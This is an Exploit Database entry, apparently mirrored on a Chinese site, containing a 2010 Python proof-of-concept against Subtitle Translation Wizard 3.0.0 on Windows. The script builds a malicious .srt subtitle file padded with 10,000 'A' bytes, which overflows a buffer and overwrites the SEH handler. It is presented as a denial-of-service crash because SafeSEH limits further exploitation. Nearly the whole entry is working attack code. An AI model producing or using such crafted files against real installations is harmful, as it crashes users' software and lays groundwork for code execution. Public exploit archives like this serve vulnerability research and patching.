Subtitle Translation Wizard 3.0.0 – Overflow (SEH) (PoC)

• Exploit Database
• 10 阅读

• 作者： blake
  日期： 2010-06-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13965/

• #!/usr/bin/python
  
  # Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC
  # Date: Jun 21, 2010
  # Author: Blake
  # Software Link: http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe
  # Version: 3.0.0
  # Tested on: Windows Vista running in VirtualBox
  
  # SEH is overwritten but only unicode compatible pop pop ret addresses are in st-wizard.exe (SafeSEH).
  
  print "\n======================================"
  print " Subtitle Translation Wizard v3.0.0 DoS "
  print " Discovered by Blake "
  print "======================================\n"
  
  buffer = "\x41" * 10000
  
  print "[+] Creating malicious srt file"
  try:
   file = open("poc.srt","w")
   file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer)
   file.close()
   print "[+] File created"
  except:
   print "[x] Could not create file"
  
  raw_input("\nPress any key to exit...\n")